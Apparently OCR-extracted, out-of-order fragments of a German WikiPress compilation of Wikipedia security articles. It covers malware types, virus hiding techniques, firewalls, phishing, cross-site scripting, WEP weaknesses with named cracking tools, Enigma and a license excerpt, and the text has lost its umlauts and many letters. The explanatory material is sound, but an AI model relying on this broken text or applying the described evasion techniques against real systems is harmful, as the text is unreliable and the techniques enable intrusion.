Viren die Dateien in freigegebenen Ordnern in LAN Netzwerken infizieren wenn sie entsprechende Rechte besitzen Im Gegensatz zu Viren warten W rmer nicht passiv darauf von einem Anwender auf einem neuen System verbreitet zu werden sondern versu chen aktiv in neue Systeme einzudringen Sie nutzen dazu Sicherheitspro bleme auf dem Zielsystem aus wie z B Netzwerk Dienste die Sta
410. ndardpassw rter oder gar kein Passwort be nutzen Design und Programmierfehler in Netzwerk Diensten Design und Programmierfehler in Anwenderprogrammen die Netz werkdienste benutzen z B E Mail Clients Ein Wurm kann sich dann wie ein Virus in eine andere Programmdatei einf gen meistens versucht er sich jedoch nur an einer unauff lligen Stel le im System mit einem unauff lligen Namen zu verbergen und ver ndert das Zielsystem so dass beim Systemstart der Wurm aufgerufen wird wie etwa die Autostart Funktion in Microsoft Windows Systemen 23 Viren W rmer Trojaner In der Umgangssprache werden Computerw rmer wie I Love You oft f lschlicherweise als Viren bezeichnet da der Unterschied f r Anwender h ufig nicht ersichtlich ist Gef hrdungsgrad unterschiedlicher Betriebssysteme Das verwendete Betriebssystem hat gro en Einfluss darauf wie hoch die Wahrscheinlichkeit einer Virusinfektion ist bzw wie hoch die Wahr scheinlichkeit f r eine systemweite Infektion ist Grunds tzlich sind alle Betriebssysteme anf llig die einem Pro gramm erlauben eine andere Datei zu manipulieren Ob Sicherheitssys teme wie z B Benutzerrechte Systeme vorhanden sind und auch benutzt werden beeinflusst in wie weit sich ein Virus auf einem System ausbrei ten kann Betriebssysteme ohne jegliche Rechtesysteme wie z B MS DOS oder Amiga Systeme sind die anf lligsten Systeme jedoch sind theoretisch Unix und Unix hnliche System
411. nde untersuchen muss Sucht ein Virenscanner also auch nach EPO Vi ren ben tigt er mehr Zeit wird der Virenscanner so eingestellt dass er Zeit spart bleiben EPO Viren meist unentdeckt F r das Entry Point Obscuring sucht sich das Virus einen speziellen Ort wie etwa eine Programmfunktion irgendwo in der Datei um diese zu infizieren Besonders lohnend ist z B die Funktion zum Beenden des Programms da sie meist ein leicht zu identifizierendes Erkennungsmuster hat und genau einmal aufgerufen wird W rde das Virus eine zeitkritische Funktion oder eine sehr h ufig aufgerufenen Funktion infizieren fiele es leichter auf Das Risiko f r EPO Viren besteht darin dass sie sich unter Umst nden einen Punkt in einem Wirt aussuchen k nnen der nie oder nicht bei jeder Ausf hrung des Wirtes aufgerufen wird Techniken Arbeitsspeicher Speicherresidente Viren verbleiben auch nach Beendi gung des Wirtprogramms im Speicher Unter MS DOS wurde eine Tech nik namens TSR Terminate but Stay Resident verwendet in Betriebssys temen wie Windows Unix oder Unix hnlichen Systemen Linux Mac OS X erzeugt das Virus einen neuen Prozess Das Virus versucht dem Prozess in diesem Fall einen unverd chtig wirkenden Prozessnamen zu geben oder seinen Prozess komplett zu verstecken Gelegentlich versuchen diese Viren auch Funktionen des Betriebssystems zu manipulieren oder auf sich um zuleiten sofern das Betriebssystem dies zul sst Selbstschutz der Vire
412. nderssprachige Nutzer dargestellt Nat rlich l sst sich die Technologie auch missbrauchen So werden die wenigsten die Mail Adressen f r Spamming sammeln dies ffentlich zu geben sei es per Text oder per P3P Bei nicht vertrauensw rdigen Website Betreibern hilft eine unzertifizierte Datenschutzrichtlinie daher nicht Im deutschsprachigen Raum unterst tzt das Unabh ngige Landeszent rum f r Datenschutz Schleswig Holstein den P3P Standard in einem Pro jekt das vom Ministerium f r Wirtschaft Arbeit und Verkehr des Landes Schleswig Holstein gef rdert wird Die Praxis zeigt dass in den USA immer mehr Internetdiensteanbieter P3P nutzen In Europa verbreitet sich dieser Standard noch etwas langsa mer jedoch mit steigender Tendenz Quelle http de wikipedia org wiki Platform_for_Privacy_Preferences Historie 25 9 04 Angelegt von NewImage danach bearbeitet von den Hauptautoren NewImage Eike sauer Sal9000 Achim Raschka Steven Malkovich anonym 12 1 06 1 2 06 WikiPress Redaktion Pretty Good Privacy Pretty Good Privacy PGP ist ein von Phil Zimmermann entwickeltes Pro gramm zur Verschliisselung von Daten Es benutzt das so genannte Pu blic Key Verfahren d h es gibt ein eindeutig zugeordnetes Schl sselpaar einen ffentlichen Schl ssel mit dem jeder die Daten f r den Empf nger verschl sseln kann und einen geheimen privaten den nur der Empf nger besitzt und der durch ein Kennwort gesch tzt ist Nachrichten an
413. ndet um Hackern eine Plattform zu geben so dass sie ber Aktivit ten berichten konnten ohne Strafver folgung bef rchten zu m ssen Die Mitarbeit im CCC ist nicht an eine Mitgliedschaft gebunden Struktur und Veranstaltungen Der CCC e V ist dezentral in einzelnen regionalen Gruppen organisiert Kleinere Gruppen hei en Chaostreffs w hrend aktivere und gr ere sich ERFA Kreise Erfahrungsaustauschkreise nennen Der erste virtuelle ERFA Kreis sind die Haecksen zu denen weibliche Mitglieder des CCC geh ren Mitglieder und Interessierte treffen sich seit 1984 einmal j hrlich zum Chaos Communication Congress Au erdem fand im Sommer 1999 und 2003 das Chaos Communication Camp auf dem Paulshof nahe der Klein stadt Altlandsberg auf dem Land statt Der internationale Charakter des Camps hat sich inzwischen auf den Kongress bertragen so dass dieser seinem Untertitel Die europ ische Hacker Party nachkommt und Eng lisch als Konferenzsprache dominiert Neben den vielen Vortr gen ber technische und gesellschaftspolitische Themen gibt es auch Workshops z B ber das Lockpicking Zu Ostern findet regelm ig in kleinerem Rahmen der workshoporientierte Easterhegg statt Dar ber hinaus gibt es ber das Jahr verteilt seit Anfang dieses Jahrzehnts viele kleine Veran staltungen mit bis zu 200 Personen die von regio nalen Gruppen organi siert werden und teils ein offenes Zusammenkom men der Gemeinschaft sind teils Vortr ge zu
414. ne Virenscanner basieren auf der Active X Technologie und sind damit an die Benutzung des Internet Explorers gebunden Es gibt aber auch Alternativen f r den plattform bergreifenden Einsatz die mit JAVA verwirklicht wurden Quelle http de wikipedia org wiki Antivirenprogramm gek rzt Historie 28 8 03 Angelegt von Diddi danach bearbeitet von den Hauptautoren Mic r Liquidat Linum MichaelDiederich Hella Diddi Reniar Tohma Cepheiden Dominik Ocrho Proggy Hajuero Steven Malkovich ChrFranke Zebbo Harald M hlb ck Alex Kulesa MovGP0 Kloth Nyks Mkogler Peacemaker Lofor Zwobot Marko Kaiser Etec47 Jeronimo anonym 12 1 06 1 2 06 WikiPress Redaktion AntiVir AntiVir ist ein bekanntes Antivirenprogramm F r Privatanwender ist der Einsatz der AntiVir PersonalEdition Classic kostenlos Freeware fiir einen erweiterten Funktionsumfang verweist der deutsche Hersteller auf das kostenpflichtige AntiVir PersonalEdition Premium Geschaftskun 79 Software den stehen weitere Editionen mit den Bezeichnungen AntiVir Worksta tion AntiVir Server AntiVir Mailserver und AntiVir WebGate zur Ver f gung Entwicklung AntiVir wurde 1988 als eines der ersten professionellen Antiviren programme berhaupt durch H BEDV Datentechnik auf den Markt gebracht Seitdem arbeitet ein st ndig wachsendes Personalteam in Tett nang am Bodensee an der Weiterentwicklung und Erweiterung des Pro gramms Juni 2004 wurde in AntiVir ei
415. ne f r strategische Funkspr che Der US Verschl sselungscode TELWA wurde von den Deutschen w hrend des Zweiten Weltkriegs geknackt Er bestand aus Buchstaben in F nfergruppen wobei die Funkspr che immer mit der Buchstaben kombination TELWA anfingen daher der Name Bei dem TELWA Code handelt es sich um einen Ersetzungs Code bei dem jeweils f nf Buch staben eine gleichbleibende Bedeutung hatten die einzelnen Buchstaben 316 Enigma in einer F nfergruppe waren voneinander abh ngig Durch die Untersu chung von Wiederholungen beispielsweise am Anfang und am Ende von Funkspr chen konnte die erste F nf Buchstaben Kombination durch die Deutschen entschl sselt werden woraus sich eine mathematische Formel zum Entschl sseln des TELWA Codes entwickeln lie Eine beim US Milit r verbreitete Verschl sselungsmaschine war die M 209 deren Funktionsprinzip vom schwedischen Unternehmer und Er finder Boris Hagelin entwickelt worden war Die erste Maschine dieser Baureihe wurde im Jahr 1936 unter der Bezeichnung C 36 an das fran z sische Milit r verkauft Boris Hagelin gr ndete sp ter in der Schweiz die heute immer noch existierende Firma Crypto AG Kurz nach Kriegs beginn fand er in den US Streitkr ften einen weiteren Gro abnehmer der die Funktionsweise des Ger ts leicht ab nderte und es anschlie end M 209 taufte Die Produktion fand in Lizenz in den USA statt Insgesamt 140 000 Exemplare der M 209 wurden w hrend des Kriegs
416. nem diesbez glich unkundigen Skriptkiddie unterschieden Begriffswandel und weitere Definitionen von Insidern Das englische Wort hack hatte im Lauf der Geschichte viele Bedeutun gen Angefangen vom schlendernden Ritt etwas mieten oder in kleine St cke hauen 14 Jahrhundert ein Schriftsteller oder jemand der routi nem ige Arbeit verrichtet 18 Jahrhundert eine Bezeichnung f r einen trockenen Husten bzw f r R uspern um aufsich aufmerksam zu machen 19 Jahrhundert erlangte es in den sp ten 1950er Jahren gleich mehrere neue Bedeutungen So verwendeten Harley Davidson Fahrer in S dkali fornien hacking als Synonym f r das Zerlegen ihrer Motorr der und nicht zuletzt f r das Tunen ihrer Fabrikate um sie niedriger schneller und sch ner als die Originale zu machen Zeitgleich wurde der Begriff hack vom Modelleisenbahnclub des MIT Massachusetts Institute of Technology genauer dem TMRC Tech Model Railroad Club of MIT verwendet Er stand hier f r besonders elegante und kreative Einf lle und L sungswege jeglicher Art Hatte ein Student des MIT einen raffinierten 175 Sonstige Themen Streich ausgeheckt galt der belt ter als Hacker Und das ohne sich unbedingt auf den Computer zu beziehen Demgegen ber nannten die Computerfreaks des MIT AI Lab Artificial Intelligence Laboratory wel che die ersten Gro rechner des MIT programmierten auch das gemeinsa me Programmieren und den freien Austausch von
417. net kommuniziert hat in der Regel mehrere Verbindungen gleichzeitig aufgebaut Eine solche Verbindung wiederum besteht aus mehreren einzelnen Datenpaketen die bidirektional ausge tauscht werden Zum Beispiel ist eine Abfrage des Namensdienstes in die sem Sinne eine Verbindung das Abrufen von E Mails eine andere Ein 96 Personal Firewall Paketfilter der Stateful Inspection zustandsgesteuerte oder dynamische Paketfilterung beherrscht kann ein Datenpaket nach dem Kriterium durchlassen ob dieses Teil einer bereits bestehenden Verbindung das hei t die Antwort auf ein vorangegangenes erlaubtes Datenpaket ist Man sagt die Filterung wird durch den Zustand der Verbindung beste hend oder nicht bestehend gesteuert Daher r hrt die Bezeichnung zu standsgesteuerte Paketfilterung Eine von mehreren M glichkeiten diese Funktion zu implementieren besteht darin dass der Paketfilter wenn er ein ausgehendes Datenpaket gem der vom Benutzer vorgegebenen Regel durchl sst eine neue Regel generiert die ein Paket das die Eigenschaften einer zu erwartenden Antwort besitzt ebenfalls erlaubt Da diese Regel nicht starr vorgegeben ist sondern vom Paketfilter dynamisch erzeugt wird spricht man auch von dynamischer Paketfilterung Eine wichtige Funktion ist die Protokollierung des Vorgehens des Pa ketfilters in einer Datei dem so genannten Logfile kurz Log So ist es m glich Fehler bei der Netzkonfiguration zu erkennen Einige Pers
418. ng von DDoS Atta cken Installation von illegalen Dialer Programmen heimliche Einwahl auf Telefon Mehrwertrufnummern was dem Opfer finanziellen Scha den zuf gt 74 Trojanisches Pferd Schutzm glichkeiten Aus den Charakteristika von Trojanischen Pferden ergibt sich direkt dass es nur eine Schutzm glichkeit vor der Infektion durch trojanische Pferde geben kann Vermeidung der Benutzung von Programmen aus unbekann ten oder unsicheren Quellen Als besonders gef hrlich einzustufen sind hierbei wie bei jeder Malware Anbieter von Programmen bzw Dienst leistungen am Rande der Legalit t Wie auch bei Computerviren sch tzen Antivirenprogramme in der Regel nur vor bekannten Trojanischen Pferden Personal Firewalls oder andere Programme zur Netzwerk ber wachung bieten keinen Schutz vor der Installation eines Trojanischen Pferdes k nnen unter Umst nden aber nach einer Infektion auf unau torisierte Netzwerkkommunikation aufmerksam machen und diese un terbinden Als theoretisch sinnvolle Bestrebungen zum Schutz gegen Trojanische Pferde und Computerviren allgemein kann man die Bestrebungen der Trusted Computing Platform Alliance TCPA ansehen die das Ausf h ren von ungepr fter d h nicht vertrauensw rdiger Software technisch unterbindbar machen will bzw die Funktionsaufrufe gepr fter und un gepr fter Software voneinander isolierbar machen will Es bleibt aber zu bedenken dass auf Grund des Prinzipes Trojanischer Pf
419. ngen spezialisiert haben werden auch als Web Shield oder Web Application Firewall bezeichnet Filter f r E Mail Anh nge werden ebenfalls h ufig angeboten Manche Firewalls verf gen ber ein Einbrucherkennungs und ab wehrsystem Im Fachjargon wird dieses Intrusion Detection System IDS beziehungsweise Intrusion Prevention System IPS genannt Man unter scheidet netzwerkbasierte NIDS und hostbasierte Intrusion Detection Systeme HIDS Ein NIDS untersucht den Netzverkehr auf bekannte Angriffsmuster und meldet deren Auftreten Schadsoftware Malware versucht oft die Filterung durch die Firewall zu umgehen Dies k nnte geschehen indem die Schadsoftware den Dienst der Personal Firewall beendet Ein m glicher Trick die Personal Firewall zu umgehen ist ein vertrauensw rdiges Programm beispielsweise den Browser zu starten und dar ber die Verbindung herzustellen Ebenso kann versucht werden ein vertrauensw rdiges Programm oder eine davon genutzte Bibliothek zu ver ndern oder sich als Erweiterung f r ein solches Programm einzu schleusen Ein hostbasiertes Intrusion Detection System versucht solche Tricks zu erkennen und warnt den Benutzer Eine weitere m gliche Funktion ist das Sandboxing Einem Programm das in einer Sandbox l uft werden Zugriffe auf bestimmte Systemressour cen verweigert Es soll dadurch verhindert werden dass eine kompromit tierte Anwendung Schaden am Betriebssystem anrichtet Ein Rechner der im Inter
420. ngriffe benutzt Als Spyware bezeichnet man Programme die Informationen ber die T tigkeiten des Benutzers sammeln und an Dritte weiterleiten Ihre Verbreitung erfolgt meist durch Trojaner Oft werden auch Dialer Einwahlprogramme auf Telefon Mehrwertruf nummern zur Malware gez hlt obwohl sie grunds tzlich nicht dazu ge h ren Illegale Dialer Programme allerdings f hren die Einwahl heimlich 21 Viren W rmer Trojaner unbemerkt vom Benutzer durch und f gen dem Opfer oft erhebli chen finanziellen Schaden zu Telefonrechnung Quelle http de wikipedia org wiki Malware Historie 2 4 04 Anonym angelgt danach bearbeitet von den Hauptautoren LosHawlos Schnargel Mikue Xeper Hendrik vm Stf GerhardG Bert2 WikiMax Wolfgang1018 Spawn Avatar Steven Malkovich RobotQuistnix Blubbalutsch Joni2 Rat anonym 12 1 06 1 2 06 WikiPress Redaktion Computervirus Das Computervirus umgangssprachlich auch der Computervirus Plu ral Computerviren ist ein sich selbst vermehrendes Computerprogramm welches sich in andere Computerprogramme einschleust und damit re produziert Einmal gestartet kann es vom Anwender nicht kontrollierbare Ver anderungen am Status der Hardware z B Netzwerkverbindungen am Betriebssystem oder an der Software vornehmen Schadfunktion Com puterviren k nnen durch vom Ersteller gew nschte oder nicht gew nsch te Funktionen die Computersicherheit beeintr chtigen und z hlen da
421. ngriffe durch Social Engineering werden zumeist kaum in der f fentlichkeit bekannt Zum einen ist es f r viele Firmen peinlich derartige Angriffe zuzugeben zum anderen geschehen viele Angriffe so geschickt dass diese nicht oder erst viel sp ter aufgedeckt werden Grenzfall des Social Engineering ist Phishing gef lschte Passwortab fragen auf Internetseiten und in E Mails weil es sich hier in erheblichem Ma e um eine technische Spionagemethode handelt Literatur Mitnick Kevin Simon William Die Kunst der T uschung Risikofak tor Mensch ISBN 3 8266 0999 9 Mitnick Kevin Simon William The Art of Deception Controlling the Human Element of Security engl ISBN 0 4712 3712 4 Quelle http de wikipedia org wiki Social_Engineering_ Sicherheit Historie 9 3 03 Anonym angelegt danach bearbeitet von den Hauptautoren Wei Nix Hunding 229 Angriffe HenrikHolke Tux edo DaB Weialawaga Suricata Hendrik Brummermann Tsca bot Fabian6129 Steven Malkovich RobotQuistnix CharlyK 4Li3N51 Ulrich fuchs Zaxxon Ralf Pfeifer Mikue anonym 12 1 06 1 2 06 WikiPress Redaktion Phishing Phishing ist eine Form des Trickbetruges im Internet Der Phisher schickt seinem Opfer offiziell wirkende Schreiben meist E Mails die es ver leiten sollen vertrauliche Informationen vor allem Benutzernamen und Passw rter oder PIN und TAN von Online Banking Zug ngen im guten Glauben dem T ter preiszugeben Die Bezeichnung
422. nn zur Malware Der Begriff Computervirus wird auch f lschlich f r Computerwiir mer und Trojanische Pferde genutzt da der bergang inzwischen flie end und f r Anwender oft nicht zu erkennen ist Arbeitsweise Wie sein biologisches Vorbild benutzt ein Computervirus die Ressourcen seines Wirtes und schadet ihm dabei h ufig Auch es vermehrt sich meist unkontrolliert Durch vom Virenautor eingebaute Schadfunktionen oder auch durch Fehler im Virus kann das Virus das Wirtsystem bzw dessen Programme auf verschiedene Weisen beeintr chtigen von harmloseren St rungen bis hin zu Datenverlust Viren brauchen im Gegensatz zu Computerw rmern einen Wirt um ihren Schadcode auszuf hren Viren haben keine eigenst ndige Verbrei tungsroutinen d h ein Computervirus kann nur durch ein infiziertes Wirtprogramm verbreitet werden Wird dieses Wirtprogramm aufgeru fen wird je nach Virentyp fr her oder sp ter das Virus ausgef hrt das sich dann selbst in noch nicht infizierte Programme weiterverbreiten oder seine eventuell vorhandene Schadwirkung ausf hren kann Heutzutage sind Computerviren fast vollst ndig von W rmern ver dr ngt worden da fast jeder Rechner an Rechnernetze lokale Netze und 22 Computervirus das Internet angeschlossen ist und die aktive Verbreitungsstrategie der W rmer in k rzerer Zeit eine gr ere Verbreitung erm glicht Viren sind nur noch in neuen Nischen von Bedeutung Unterschied zwischen Virus u
423. nn eine Software die diese Sperrliste auswertet pr fen ob die Integrit t der Sperrliste gew hrleistet ist Solche Sperrlisten sind theoretisch recht einfach zu erstellen und zu verwalten werden jedoch in der Praxis bislang selten verwendet Das Pro blem ist dass ein Programm vor Verwendung eines Schl ssels immer bei der Zertifizierungsstelle r ckfragen muss was voraussetzt dass eine In ternetverbindung besteht Wenn keine Verbindung besteht kann das Zer tifikat nicht gepr ft werden und dann ist es m glich dass ein Schl ssel benutzt wird der bereits Unbefugten bekannt ist Ein neueres Protokoll zur Abfrage von Zertifikatsg ltigkeiten ist das Online Certificate Status Protocol OCSP Quelle http de wikipedia org wiki Zertifikatsperrliste Historie 4 8 04 Anonym angelegt danach bearbeitet von den Hauptautoren Duesentrieb PeerBr Jpp Crux Schubbay Steven Malkovich anonym 12 1 06 1 2 06 WikiPress Redaktion 153 Sonstige Themen Selbstdatenschutz Selbstdatenschutz bedeutet die Gefahren hinsichtlich Datenschutz und Datensicherheit kennenzulernen und selbst aktiv Gegenma nahmen zu ergreifen Insbesondere durch die weltweite Vernetzung gibt es in Bezug auf personenbezogene Daten neue Bedrohungen in bis dahin nie gekanntem Ausma Problematisch ist an der Internettechnologie vor allem dass sie bereits einen sehr hohen Komplexit tsgrad erreicht hat Selbst einzelne Fachleute sind heute nicht mehr in der Lage
424. nnt oder verhindert werden konnte Stealth Modus Kritisch wird der von manchen Firewall Produkten angebotene Stealth Modus siehe weitere Funktionen gesehen Entgegen 100 Personal Firewall den Empfehlungen der RFCs verwirft der Paketfilter im Stealth Modus alle Anfragen kommentarlos DROP anstatt mit ICMP Kontrollnach richten zu antworten Wenn der Router des Providers auf Pings nicht mit Destination unreachable antwortet wei ein Angreifer jedoch dass der Rechner existiert Ein Portscanner kann das Problem dass Anfragen in einen Timeout laufen umgehen Er sendet die Anfragen parallel und sammelt alle Antworten Kommt keine Antwort wird der Zustand des entsprechenden Ports als gefiltert angezeigt Der Portscan wird ausge bremst aber nicht verhindert Regul re Programme k nnen durch diese Strategie behindert werden Dies gilt beispielsweise f r Internet Anwendungen die den Authentifi zierungsdienst auch auth service oder ident genannt nutzen Manche Server bauen im Rahmen des Anmeldevorgangs eine Verbindung zum TCP Port 113 dem Auth Service des Client Computers auf Man spricht von einer Ident Anfrage Diese dient Administratoren von Mehrbenutzer systemen dazu festzustellen welcher Benutzer den Service verwendet hat Heimanwender ben tigen den Authentifizierungsdienst nicht Wird die Ident Anfrage jedoch nicht zur ckgesetzt sondern l uft auf Grund der Firewall in einen Timeout kann es zu Problemen bei der An
425. nsch der nicht dieser Strahlung exponiert sein m chte ist gewisserma en machtlos der Willk r der WLAN Nutzer ausgeliefert Dieses Argument ist selbstverst ndlich im Bereich der GSM und UMTS Netze noch viel schwerwiegender da in diesen Bereichen die Umwelt viel massiver beeintr chtigt wird Es gilt zu bedenken dass die Mikrowellenstrahlung normalen Mauerstein problemlos durchdringt Diverse Medien ver ndern lediglich die Reflexionen der elektromagneti schen Welle 245 WLAN Frequenzen Es gibt mittlerweile mehrere WLAN Frequenzb nder die teilweise auf v llig unterschiedlichen Frequenzen arbeiten Standard Frequenzen Kan le IEEE 802 11a 5 15 GHz bis 5 725 GHz Kan le 19 alle Uberlappungsfrei in Europa mit TPC und DFS nach 802 11h IEEE 802 11b 2 4GHz bis 2 4835 GHz Kan le 11 in den USA 13 in Europa 14 in Japan Maximal 3 Kan le berlappungsfrei nutzbar IEEE 802 119 2 4GHz bis 2 4835 GHz Kan le 11 in den USA 13 in Europa 14 in Japan Maximal 3 Kan le berlappungsfrei nutzbar Die Kanalbandbreite betr gt bei allen Standards zwischen 10 und 30 MHz Datenraten IEEE 802 11 2 Mbps maximal IEEE 802 11a 54 Mbps maximal 108 Mbps bei 40 MHz Bandbreite propriet r IEEE 802 11b 11 Mbps maximal 22 Mbps bei 40 MHz Bandbreite proprietar 44 Mbps bei 60 MHz Bandbreite proprietar IEEE 802 119 54 Mbps maximal g 108 Mbps IEEE 802 11h 54 Mbps maximal 108 Mbps bei 40 MHz Bandbreite IEEE 802 11n 540 M
426. nsweise Hinter dem Begriff Cross Site Scripting verbergen sich zwei grunds tzlich unterschiedliche Angriffsvektoren die immer wieder verwechselt oder undif ferenziert betrachtet werden Es handelt sich dabei um die beiden Folgenden Clientseitig Beim clientseitigen Cross Site Scripting wird Code auf der Seite des Clients ausgef hrt etwa dem Webbrowser oder E Mail Pro gramm Daher muss der Angreifer seinem Opfer einen pr parierten Hy perlink zukommen lassen den er zum Beispiel in eine Webseite einbindet oder in einer E Mail versendet Es werden h ufig URL Spoofing Techni ken und Kodierungsverfahren eingesetzt um den Link unauff llig oder vertrauensw rdig erscheinen zu lassen Ein klassisches Beispiel f r clientseitiges Cross Site Scripting ist die bergabe von Parametern an ein CGI Skript einer Website So ist es un ter Umst nden m glich manipulierte Daten an den Benutzer zu senden Diese Daten sind oft Code einer clientseitigen Skriptsprache die als Para meter an eine Website bergeben werden Wenn dieser Code dann in der vom Server zur ckgesendeten Webseite wieder auftaucht kann es dazu f hren dass der Webbrowser des Benutzers diesen Code ausf hrt Dies kann erreicht werden indem Daten in ein Formular auf der Seite einge geben werden das normalerweise als Eingabefenster f r ein Webforum dient oder indem eine URL mit dem Code als Parameter ver ffentlicht wird auf die die User klicken z B in E Mails oder im Usen
427. nt dass Hans Thilo Schmidt Deckname Asch an Bertrand hnliche 310 Enigma Unterlagen lieferte Es wird angenommen dass Rejewski auch ohne diese ausgekommen w re wenngleich sie zweifellos hilfreich waren Die Arbeiten der britischen Kryptoanalysten fanden in Bletchley Park unter dem Codenamen Ultra statt Sie setzten die Arbeit an der Stel le fort wo Rejewski aufh ren musste und erreichten unter anderem das Dechiffrieren der 1939 verbesserten Enigma Version Sie machten sich daf r vor allem Nachl ssigkeiten der deutschen Chiffrierer zu Nutze wie derkehrende oder schlecht gew hlte Nachrichtenschl ssel schematischer Nachrichtenaufbau z B Wettermeldungen oder Positionsangaben usw Insgesamt arbeiteten etwa 7000 Frauen und M nner in Bletchley Vergli chen mit den 15 polnischen Kryptologen der Gruppe Z im unbesetzen Frankreich Cadix 1940 eine zahlenm ig haushohe berlegenheit der Briten womit diese jedoch etwas nicht aus eigener Kraft ausgleichen konn ten was sie schon 1939 unwiederbringlich verloren hatten Zeit Nach Of fenlegung einiger Geheimarchive muss als gesichert gelten dass der von Rejewski erreichte Forschungsstand auf alliierter Seite nicht eigenst ndig reproduziert h tte werden k nnen 1939 wurden auf polnische Initiative hin die verb ndeten Dienste vollumf nglich in die polnische Dechiffrier Technik eingeweiht sowie Schl sselmaterial und technik bergeben Einer der Wissenschaftler in Bletch
428. nt sein Der vordere Umschlag muss den gesamten Titel zeigen wobei alle Worte des Titels gleicherma en auff llig und sichtbar sein m ssen Sie k nnen den Umschl gen weiteres Material hinzuf gen Kopien die nderungen enthalten die sich nur auf die Umschl ge beziehen k nnen als unver nderte Kopien behandelt werden so lange der Titel des Dokuments erhalten bleibt und diese Bedingungen erf llt werden Wenn die erforderlichen Texte f r einen der Umschl ge zu umfangreich sind sollten die ersten Texte auf dem eigentlichen Umschlag stehen so viele wie vern nftigerweise darauf passen und der Rest dann auf den unmittelbar folgenden Seiten Wenn Sie mehr als 100 opake Kopien des Dokuments ver ffentlichen oder verbreiten m ssen Sie entweder jeder opaken Kopie eine maschinenlesbare transparente Kopie beilegen oder in bzw mit jeder opaken Kopie eine Computer Netzwerk Adresse angeben auf die jeder Netzwerknutzer Zugriff zum Download einer kompletten transparenten Kopie des Dokuments ohne zus tzliche Materialien ber ffentliche Standardnetzwerkprotokolle hat Wenn Sie sich f r letztere M glichkeit entscheiden m ssen Sie wenn Sie opake Kopien in gr erer St ckzahl vertreiben angemessene Schritte unternehmen um zu gew hrleisten dass die transparente Kopie noch mindestens ein Jahr nach dem Vertrieb der letzten opaken Kopie dieser Ausgabe direkt oder ber einen Agenten oder H ndler an der genannten Adresse ffentlich verf gba
429. nterschied zur Original Bankadresse Diese Methode ist selbst f r Experten erst bei genauerem Hinsehen zu durchschauen Es wurden Trojaner entdeckt die gezielt Manipulationen an der HOSTS Datei des Betriebssystems vornahmen In der HOSTS Datei k n nen rechnerindividuelle Umsetzungen hinterlegt werden Eine Manipula tion dieser Datei kann bewirken dass anstatt der Original Site nur noch die gef lschte Site aufgerufen werden kann obwohl die korrekte Adresse eingegeben wurde Pharming Alle Beispiele sind zu Demonstrationszwecken frei erfunden Erkennung Erfahrene Mail Nutzer erkennen Phishing E Mails auf den ersten Blick insbesondere anhand typischer Merkmale Dringlichkeit Es wird aufgefordert schnellstm glich etwas durchzu f hren oft eine angebliche Sicherheits berpr fung Verifikation Freischaltung oder andere wichtig klingende Aktionen Drohung Es wird angedroht bei Nichtbeachtung werde ein Zugang gesperrt gel scht oder etwas anderes Schlimmes oder L stiges gesche he Abfrage sicherheitsrelevanter Informationen Entweder in einem For mular innerhalb der E Mail oder auf einer verlinkten Website Am h ufigsten Onlinebanking Passworte und TANs aber auch Passworte anderer Dienste z B Versandh user Online Auktionsh user Beson dere Vorsicht ist geboten wenn zur Eingabe mehrerer TANs aufgefor dert wird Webseite Die E Mail enth lt einen Link zum Anklicken Unpers nlich Nur eine allgemeine Anrede wi
430. ntlichen Provider ermitteln Beispiel Die IP Nummer geh rt einer deutschen Firma die schon vom Namen her Internet Werbung als Gesch ftsziel hat nur ber 128 IP Nummern ver f gt und offenbar ber die Telekom ans Internet angeschlossen ist Dann beschwert man sich direkt bei der Telekom DiemeistenProviderhabeneineeigeneBeschwerde Adresse abuse die jedoch nicht immer im Whois Server eingetragen ist Um zu ermit teln welches die richtige Beschwerde Adresse zu einer bestimmten Do main ist leistet http www abuse net wertvolle Dienste wo allerdings nicht direkt anhand IP Adressen Nummern nachgesehen werden kann weil IP Adressen fters den Besitzer wechseln Die Beschwerde verfasst man knapp und h flich und h ngt eine voll st ndige Kopie der missbr uchlichen E Mail mit gt in der ersten Spalte unten dran und zwar nicht als Attachment Dass der Header vollst n dig vor allem mit allen Received Zeilen mit enthalten ist spielt f r den Missbrauchs Sachbearbeiter eine entscheidende Rolle um den T ter zu ermitteln Eine Ausnahme ist abuse wanadoo fr wo Beschwerden mit UBE verwechselt und zur ckgewiesen werden wenn sie mehr von der missbr uchlichen E Mail zitieren als nur den Header M glichkeiten zur Automatisierung dieses Ermittlungs und Be schwerdeprozesses bieten Dienstleister wie beispielsweise SpamCop Wer sich hier registriert hat kann einfach den Quelltext einer UCE dorthin schicken und erh lt in d
431. nzen wird der Initialisierungsvektor vorangestellt Aus dem IV kann der Empf nger schlie lich zusammen mit dem RC4 Schl ssel wieder den Klartext der Nachricht berechnen Schwachstellen CRC32 ist ebenso wie RC4 linear und gilt somit mathematisch als un sicher Daher ist es m glich die Bits zu berechnen die sich in der Priif summe ndern m ssen wenn man den Geheimtext ndert Verschiedene Gruppierungen konnten die genutzten WEP Schl ssel und damit die gesamte WEP Verschl sselung knacken Mittlerweile gibt es f r verschiedene Systeme Zubeh r welches durch Mith ren einer aus reichenden Menge des Datenverkehrs den verwendeten WEP Schl ssel berechnen kann zum Beispiel Aircrack oder Airsnort Au erdem sind mittlerweile noch weitere Angriffsm glichkeiten bekannt geworden So ist es beispielsweise m glich wenn auch nur eine der bermittelten Nachrich ten auch im Klartext bekannt ist beliebige Inhalte korrekt verschl sselt in das WLAN einzuspeisen Des Weiteren lassen sich anhand bestimmter Signaturen gezielt ARP Pakete abfangen die ohne ihren entschl sselten Inhalt zu kennen wieder verschl sselt in das WLAN eingespeist werden Dadurch werden Antworten des Access Points forciert so dass innerhalb k rzester Zeit 5 bis 10 min ausreichend Daten gesammelt werden k n nen um den verwendeten WEP Schl ssel zu errechnen Folglich ist WEP nicht mehr als ausreichend sicher anzusehen Sicherheitsma nahmen L s
